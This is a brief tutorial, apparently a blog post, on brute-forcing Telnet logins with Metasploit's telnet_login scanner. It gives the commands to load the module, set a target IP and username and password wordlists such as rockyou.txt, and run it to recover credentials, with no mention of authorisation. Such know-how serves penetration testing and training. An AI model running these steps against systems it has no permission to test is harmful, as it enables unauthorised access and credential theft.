Telnet is an application protocol used on the Internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. User data is interspersed in-band with Telnet control information in an 8-bit byte oriented data connection over the Transmission Control Protocol (TCP). it works on port 23 default. to know more on this topic, visit Wikipedia via this link;
In this tutorial, we will try to hack(gaining the telnet shell) the telnet with a very famous tool Metasploit. this topic is not that important as it sounds. because nobody uses the telnet these days. everyone likes to use the SSH.
Attack
open your terminal and type this to start Metasploit:
msfconsole
after that, we need to find the module that can help us to perform brute-force.
type this in Metasploit:
search telnet_login
you will have this”auxiliary/scanner/telnet/telnet_login
” in result
now, it is important to have a wordlist. you can use rockyou.txt or other wordlists.
now set some values:
set RHOSTS <the IP that is running telnet service>
set USER_FILE <the path of wordlist>
set PASS_FILE <the path of wordlist>
that’s it. after that, just type exploit to run it. this process can take some time to find creds if you have those creds in your wordlist.
Thanks For Visiting.